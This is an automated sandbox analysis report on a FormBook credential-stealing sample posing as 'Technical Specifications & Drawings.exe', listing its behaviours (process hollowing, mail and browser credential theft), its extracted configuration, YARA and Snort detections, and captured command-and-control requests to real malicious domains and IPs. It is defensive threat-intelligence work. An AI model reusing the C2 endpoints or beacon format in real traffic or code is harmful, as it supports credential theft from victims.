Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Technical Specifications & Drawings.exe

Overview

General Information

Sample Name:Technical Specifications & Drawings.exe
Analysis ID:680337
MD5:9b94f751e8cc145058db9f428c2ad571
SHA1:f12af989efe2b3b11e4784899ca4c6794da17879
SHA256:893a0b655917a18e5886348b39f6023fa851cf3d89e5b8709219ad3d2766fa97
Tags:exeFormbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Deletes itself after installation
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • Technical Specifications & Drawings.exe (PID: 6080 cmdline: "C:\Users\user\Desktop\Technical Specifications & Drawings.exe" MD5: 9B94F751E8CC145058DB9F428C2AD571)
    • Technical Specifications & Drawings.exe (PID: 5084 cmdline: C:\Users\user\Desktop\Technical Specifications & Drawings.exe MD5: 9B94F751E8CC145058DB9F428C2AD571)
      • explorer.exe (PID: 3968 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • control.exe (PID: 1896 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.tomoptique.fr/02pi/"], "decoy": ["M3tfGJmJRxnXx2v38A==", "m4b8szAh7fn1GFTQt32C+uKxPpY=", "aq5+I6igUigQzHUz", "4lHg1pN4fbZQ8Hg5", "pZgq+XdYRJZGtZpXb/gobxk=", "ngmngHIN+PJf3danjt0=", "aWHnw0nyXCgQzHUz", "Qa+KQe7PL5g83V8q", "lX0/3lMZHyGWQPyVm46Q9eKxPpY=", "syPESuXcWyQQzHUz", "ULeDOo1rfqvVcCs=", "COFEArOnRS4JMdemgP8DLQqSNA==", "OqdvdWhJyOqVPg==", "ANt3czoMin1DUZcstDUe", "rKFuM+S9pv/riVlgxBgU", "xzso55N63kL1Ltanjt0=", "hu2RdTMU7NZL0ZeqvEGH7OKxPpY=", "phmUZhkO/d6ZTx6mWMQ=", "Wj2oYxTKjw68jMwazrQW", "lv2aiTsU6N7OqJUTBj2Y+uKxPpY=", "5L0q4IlGEpRTlSYstDUe", "FvK8ah8qZ6vVcCs=", "abtoVRsE4tE6sNIRwiGUA+KxPpY=", "y8Gdr3IxeuRASI4Jy+8KaA==", "N7Em3E0iRrJy3danjt0=", "OBWvoWlwJbCSGdanjt0=", "kHkzKtyb51bk65cS+g==", "BVkF/LV3JBY+srgvS9U=", "fd2hjkcgFnNDp9ilV9U=", "edamUMWCAMievvdJA4WztmMX", "h/qtrJyTWSJL/PxJHlLzWAg=", "kWe7Ro0IyOqVPg==", "QrAe3YpmUGlDSXfy/wMvSTmfNg==", "ZWHgx4I+k/iuEUaNFmBIl0c0Hiy9", "iPlzLaJyecBx3tanjt0=", "Fo9S+XIwpyB1byMstDUe", "SkLiwnZYrCYQrGBeaKYibhE=", "XcysZNaTMwWxq2OmTRULYA==", "aNu4UwbkA17EoBLXgP02mT00Hiy9", "Mo8yuSKja+g9", "607Ad/rXD5aMLt2xfIZ2e1NnoZ4=", "pXk25GIbEhR4+i13QkI+STmfNg==", "uysGFdukYWM8/QtMBEyc/uKxPpY=", "fmH+9tKRYRD/oVthN3aztmMX", "TbWDRDb0g9Ciq2OmTRULYA==", "tqF7KKme4y7gKNanjt0=", "6+CEgnJVgQLuirED1LIRexM=", "YFTOiPnMSI9rJw==", "k/yeppGCO9fBv/c8", "Kqk+FsSThJHxaSMiNY+ztmMX", "HezQg/rXDY51FtXgrAd8lkv0sCmtHTtGnw==", "GWjsvjb3CHtxvjlKOYiztmMX", "QCnkguifwkk/mCkstDUe", "zTm3ZwwBFoJjoigstDUe", "4VQ4+q5U0aUIx2v38A==", "7c038ndW7jMCtjw=", "8d6NjFQhZqvVcCs=", "xqJFQfyja+g9", "iHDxwkgzyOqVPg==", "OSu/mIgimCB8X9MWJixbvWOuqdoDwaU=", "Sq1WTzwwyOqVPg==", "huZUE5ZZNtqY/wlhy+8KaA==", "g27epFQnkhaSqe1sRB2ztmMX", "b9WRoY5wEffprIkPy+8KaA=="]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x65b1:$a1: 3C 30 50 4F 53 54 74 09 40
    • 0x1dbe0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xa53f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x16de7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x16be5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x16691:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x16ce7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x16e5f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa10a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x158ac:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xae52:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1c837:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1d94a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x19289:$sqlite3step: 68 34 1C 7B E1
    • 0x193bc:$sqlite3step: 68 34 1C 7B E1
    • 0x192cb:$sqlite3text: 68 38 2A 90 C5
    • 0x19413:$sqlite3text: 68 38 2A 90 C5
    • 0x192e2:$sqlite3blob: 68 53 D8 7F 8C
    • 0x19435:$sqlite3blob: 68 53 D8 7F 8C
    00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      Click to see the 29 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      4.0.Technical Specifications & Drawings.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        4.0.Technical Specifications & Drawings.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x57b1:$a1: 3C 30 50 4F 53 54 74 09 40
        • 0x1cde0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0x973f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x15fe7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        4.0.Technical Specifications & Drawings.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x15de5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15891:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15ee7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1605f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x930a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x14aac:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa052:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1ba37:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1cb4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        4.0.Technical Specifications & Drawings.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18489:$sqlite3step: 68 34 1C 7B E1
        • 0x185bc:$sqlite3step: 68 34 1C 7B E1
        • 0x184cb:$sqlite3text: 68 38 2A 90 C5
        • 0x18613:$sqlite3text: 68 38 2A 90 C5
        • 0x184e2:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18635:$sqlite3blob: 68 53 D8 7F 8C
        0.2.Technical Specifications & Drawings.exe.39fd758.9.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          Click to see the 3 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          Timestamp:192.168.2.367.23.226.11949803802031412 08/08/22-12:28:44.161490
          SID:2031412
          Source Port:49803
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.367.23.226.11949803802031453 08/08/22-12:28:44.161490
          SID:2031453
          Source Port:49803
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.367.223.117.7249809802031449 08/08/22-12:28:49.631208
          SID:2031449
          Source Port:49809
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.367.223.117.7249809802031412 08/08/22-12:28:49.631208
          SID:2031412
          Source Port:49809
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.367.223.117.7249809802031453 08/08/22-12:28:49.631208
          SID:2031453
          Source Port:49809
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.367.23.226.11949803802031449 08/08/22-12:28:44.161490
          SID:2031449
          Source Port:49803
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: Technical Specifications & Drawings.exeVirustotal: Detection: 32%Perma Link
          Source: Technical Specifications & Drawings.exeReversingLabs: Detection: 21%
          Yara detected FormBook
          Source: Yara matchFile source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Technical Specifications & Drawings.exe.39fd758.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: http://www.kirchhoff-darryl.com/02pi/?ZL0=JO9pwDAFX0pE08ZhB6JsQfIKbq32cMNHUs94bAK91+KgqpPGSJqKC7J3zS0r1gze3M+2qFZl2NsX2aSbasAE+ZE0SL8u6zgnew==&wRtdp=ETVPg0_Avira URL Cloud: Label: malware
          Source: http://www.tomoptique.fr/02pi/?ZL0=thvfohwi7xD8LUPTC+PvURbDlMdrWv6G+kdQz5W5EjaeNcjaAM/7YzWabXa+Emqnmxa+j2rvyn8aQKdomTvD7NHn7LH6m5q/aw==&wRtdp=ETVPg0_Avira URL Cloud: Label: malware
          Source: http://www.mexc-event-partner.site/02pi/?ZL0=OtaEbXX4ObCoLhtF/lWLZX2dLDLBfFgcjwhWC5AcKk5LEysMwPLPLl+t4RfX0ATi8hGNnWUlfKNR4DoGgewcnJOxYMoo89i/Ow==&wRtdp=ETVPg0_Avira URL Cloud: Label: malware
          Source: http://www.esandcraic.com/02pi/?ZL0=H3j/zDn1cik0H8aEc4JTyOZmy0u09IlpCgxUGgbrjIcqKZuTm1TQkyEN0mTnJzpMGdd8V9PF4iBs4MdYqflf8PDJEP40yO/f8Q==&wRtdp=ETVPg0_Avira URL Cloud: Label: malware
          Source: http://www.kirchhoff-darryl.com/02pi?ZL0=JO9pwDAFX0pE08ZhB6JsQfIKbq32cMNHUs94bAK91Avira URL Cloud: Label: malware
          Source: http://www.mexc-event-partner.site/02pi/Avira URL Cloud: Label: malware
          Source: www.tomoptique.fr/02pi/Avira URL Cloud: Label: malware
          Multi AV Scanner detection for domain / URL
          Source: boshi-eg.onlineVirustotal: Detection: 12%Perma Link
          Source: mexc-event-partner.siteVirustotal: Detection: 5%Perma Link
          Machine Learning detection for sample
          Source: Technical Specifications & Drawings.exeJoe Sandbox ML: detected
          Source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.tomoptique.fr/02pi/"], "decoy": ["M3tfGJmJRxnXx2v38A==", "m4b8szAh7fn1GFTQt32C+uKxPpY=", "aq5+I6igUigQzHUz", "4lHg1pN4fbZQ8Hg5", "pZgq+XdYRJZGtZpXb/gobxk=", "ngmngHIN+PJf3danjt0=", "aWHnw0nyXCgQzHUz", "Qa+KQe7PL5g83V8q", "lX0/3lMZHyGWQPyVm46Q9eKxPpY=", "syPESuXcWyQQzHUz", "ULeDOo1rfqvVcCs=", "COFEArOnRS4JMdemgP8DLQqSNA==", "OqdvdWhJyOqVPg==", "ANt3czoMin1DUZcstDUe", "rKFuM+S9pv/riVlgxBgU", "xzso55N63kL1Ltanjt0=", "hu2RdTMU7NZL0ZeqvEGH7OKxPpY=", "phmUZhkO/d6ZTx6mWMQ=", "Wj2oYxTKjw68jMwazrQW", "lv2aiTsU6N7OqJUTBj2Y+uKxPpY=", "5L0q4IlGEpRTlSYstDUe", "FvK8ah8qZ6vVcCs=", "abtoVRsE4tE6sNIRwiGUA+KxPpY=", "y8Gdr3IxeuRASI4Jy+8KaA==", "N7Em3E0iRrJy3danjt0=", "OBWvoWlwJbCSGdanjt0=", "kHkzKtyb51bk65cS+g==", "BVkF/LV3JBY+srgvS9U=", "fd2hjkcgFnNDp9ilV9U=", "edamUMWCAMievvdJA4WztmMX", "h/qtrJyTWSJL/PxJHlLzWAg=", "kWe7Ro0IyOqVPg==", "QrAe3YpmUGlDSXfy/wMvSTmfNg==", "ZWHgx4I+k/iuEUaNFmBIl0c0Hiy9", "iPlzLaJyecBx3tanjt0=", "Fo9S+XIwpyB1byMstDUe", "SkLiwnZYrCYQrGBeaKYibhE=", "XcysZNaTMwWxq2OmTRULYA==", "aNu4UwbkA17EoBLXgP02mT00Hiy9", "Mo8yuSKja+g9", "607Ad/rXD5aMLt2xfIZ2e1NnoZ4=", "pXk25GIbEhR4+i13QkI+STmfNg==", "uysGFdukYWM8/QtMBEyc/uKxPpY=", "fmH+9tKRYRD/oVthN3aztmMX", "TbWDRDb0g9Ciq2OmTRULYA==", "tqF7KKme4y7gKNanjt0=", "6+CEgnJVgQLuirED1LIRexM=", "YFTOiPnMSI9rJw==", "k/yeppGCO9fBv/c8", "Kqk+FsSThJHxaSMiNY+ztmMX", "HezQg/rXDY51FtXgrAd8lkv0sCmtHTtGnw==", "GWjsvjb3CHtxvjlKOYiztmMX", "QCnkguifwkk/mCkstDUe", "zTm3ZwwBFoJjoigstDUe", "4VQ4+q5U0aUIx2v38A==", "7c038ndW7jMCtjw=", "8d6NjFQhZqvVcCs=", "xqJFQfyja+g9", "iHDxwkgzyOqVPg==", "OSu/mIgimCB8X9MWJixbvWOuqdoDwaU=", "Sq1WTzwwyOqVPg==", "huZUE5ZZNtqY/wlhy+8KaA==", "g27epFQnkhaSqe1sRB2ztmMX", "b9WRoY5wEffprIkPy+8KaA=="]}
          Source: Technical Specifications & Drawings.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: Technical Specifications & Drawings.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: wntdll.pdbUGP source: Technical Specifications & Drawings.exe, 00000004.00000003.260883902.000000000144C000.00000004.00000800.00020000.00000000.sdmp, Technical Specifications & Drawings.exe, 00000004.00000003.262790961.00000000015E3000.00000004.00000800.00020000.00000000.sdmp, Technical Specifications & Drawings.exe, 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000003.349077296.000000000423C000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000003.346500614.000000000409E000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000002.515758890.00000000044EF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000002.513604126.00000000043D0000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: Technical Specifications & Drawings.exe, Technical Specifications & Drawings.exe, 00000004.00000003.260883902.000000000144C000.00000004.00000800.00020000.00000000.sdmp, Technical Specifications & Drawings.exe, 00000004.00000003.262790961.00000000015E3000.00000004.00000800.00020000.00000000.sdmp, Technical Specifications & Drawings.exe, 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000003.349077296.000000000423C000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000003.346500614.000000000409E000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000002.515758890.00000000044EF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000002.513604126.00000000043D0000.00000040.00000800.00020000.00000000.sdmp

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 109.234.162.62 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.mexc-event-partner.site
          Source: C:\Windows\explorer.exeDomain query: www.gzkanglongkeji.com
          Source: C:\Windows\explorer.exeNetwork Connect: 107.155.208.43 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 184.168.107.80 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 67.23.226.119 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.kirchhoff-darryl.com
          Source: C:\Windows\explorer.exeNetwork Connect: 67.223.117.72 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.boshi-eg.online
          Source: C:\Windows\explorer.exeDomain query: www.tomoptique.fr
          Source: C:\Windows\explorer.exeDomain query: www.esandcraic.com
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49803 -> 67.23.226.119:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49803 -> 67.23.226.119:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49803 -> 67.23.226.119:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49809 -> 67.223.117.72:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49809 -> 67.223.117.72:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49809 -> 67.223.117.72:80
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.tomoptique.fr/02pi/
          Source: Joe Sandbox ViewASN Name: O2SWITCHFR O2SWITCHFR
          Source: Joe Sandbox ViewASN Name: BEKKOAMEBEKKOAMEINTERNETINCJP BEKKOAMEBEKKOAMEINTERNETINCJP
          Source: global trafficHTTP traffic detected: GET /02pi/?ZL0=JO9pwDAFX0pE08ZhB6JsQfIKbq32cMNHUs94bAK91+KgqpPGSJqKC7J3zS0r1gze3M+2qFZl2NsX2aSbasAE+ZE0SL8u6zgnew==&wRtdp=ETVPg0_ HTTP/1.1Host: www.kirchhoff-darryl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /02pi/?ZL0=thvfohwi7xD8LUPTC+PvURbDlMdrWv6G+kdQz5W5EjaeNcjaAM/7YzWabXa+Emqnmxa+j2rvyn8aQKdomTvD7NHn7LH6m5q/aw==&wRtdp=ETVPg0_ HTTP/1.1Host: www.tomoptique.frConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /02pi/?ZL0=4npjF3s9G6uWNp4ceBGqcNUcjkX96JEG8J4d3OAuWw45Kxpl9gSb2BHY5Eg4Nc6InaukRaYVJuT4y0aleUHPUlqgoOBFmRDZHQ==&wRtdp=ETVPg0_ HTTP/1.1Host: www.boshi-eg.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /02pi/?ZL0=H3j/zDn1cik0H8aEc4JTyOZmy0u09IlpCgxUGgbrjIcqKZuTm1TQkyEN0mTnJzpMGdd8V9PF4iBs4MdYqflf8PDJEP40yO/f8Q==&wRtdp=ETVPg0_ HTTP/1.1Host: www.esandcraic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /02pi/?ZL0=OtaEbXX4ObCoLhtF/lWLZX2dLDLBfFgcjwhWC5AcKk5LEysMwPLPLl+t4RfX0ATi8hGNnWUlfKNR4DoGgewcnJOxYMoo89i/Ow==&wRtdp=ETVPg0_ HTTP/1.1Host: www.mexc-event-partner.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 67.223.117.72 67.223.117.72
          Source: Joe Sandbox ViewIP Address: 67.23.226.119 67.23.226.119
          Source: global trafficHTTP traffic detected: POST /02pi/ HTTP/1.1Host: www.mexc-event-partner.siteConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.mexc-event-partner.siteUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.mexc-event-partner.site/02pi/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 5a 4c 30 3d 44 76 79 6b 59 68 57 49 4d 35 4c 42 4a 6a 4d 50 6a 54 75 63 62 57 6d 55 44 47 6a 73 66 32 46 4f 72 53 64 48 57 70 34 47 61 33 74 68 66 6a 38 75 79 5f 54 78 59 47 53 44 75 33 62 4c 39 42 7a 62 39 47 57 70 74 79 46 63 62 75 70 69 6f 68 6f 32 6d 5a 51 56 77 5a 7e 45 62 35 42 51 71 64 43 78 66 72 6f 78 42 49 62 70 39 44 47 75 43 31 5a 30 69 52 7a 49 4d 53 7a 7a 32 78 43 77 6d 76 61 52 4e 31 7a 49 62 44 50 49 4d 5f 62 72 31 33 36 6b 6d 7a 39 35 4e 67 61 62 55 51 4a 31 6b 50 63 62 41 55 71 63 37 55 45 52 32 73 48 51 55 66 46 65 5a 46 4f 7a 35 4e 4e 35 7a 68 6b 4a 6b 50 6b 35 57 53 37 6a 28 47 52 42 41 71 49 7a 64 74 78 42 54 72 46 39 36 4c 77 2d 57 32 63 52 66 32 63 57 74 31 28 5f 4b 43 54 63 65 35 74 43 76 64 59 53 45 5f 6f 36 59 31 59 2d 41 79 45 43 4f 36 6e 73 66 6e 71 72 39 4d 35 34 6d 44 79 6f 39 47 71 66 4f 48 6c 58 37 74 41 41 7a 32 51 4a 71 51 41 63 33 52 49 4f 45 2d 42 64 71 4a 48 6c 69 37 6b 68 41 6c 45 4f 6d 68 6a 72 35 37 6b 71 6e 4e 55 6f 6e 4e 66 4f 51 70 48 43 58 79 67 71 66 58 67 68 77 34 71 52 56 47 6c 61 38 50 50 57 5a 63 4c 6c 7e 38 65 44 72 52 57 79 48 4a 59 70 30 53 4a 41 56 59 6c 76 6d 33 33 33 6c 6f 4f 2d 6b 6b 54 2d 63 69 57 52 79 36 54 35 7a 51 79 71 52 6f 44 4c 6d 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ZL0=DvykYhWIM5LBJjMPjTucbWmUDGjsf2FOrSdHWp4Ga3thfj8uy_TxYGSDu3bL9Bzb9GWptyFcbupioho2mZQVwZ~Eb5BQqdCxfroxBIbp9DGuC1Z0iRzIMSzz2xCwmvaRN1zIbDPIM_br136kmz95NgabUQJ1kPcbAUqc7UER2sHQUfFeZFOz5NN5zhkJkPk5WS7j(GRBAqIzdtxBTrF96Lw-W2cRf2cWt1(_KCTce5tCvdYSE_o6Y1Y-AyECO6nsfnqr9M54mDyo9GqfOHlX7tAAz2QJqQAc3RIOE-BdqJHli7khAlEOmhjr57kqnNUonNfOQpHCXygqfXghw4qRVGla8PPWZcLl~8eDrRWyHJYp0SJAVYlvm333loO-kkT-ciWRy6T5zQyqRoDLmA).
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 08 Aug 2022 10:28:44 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
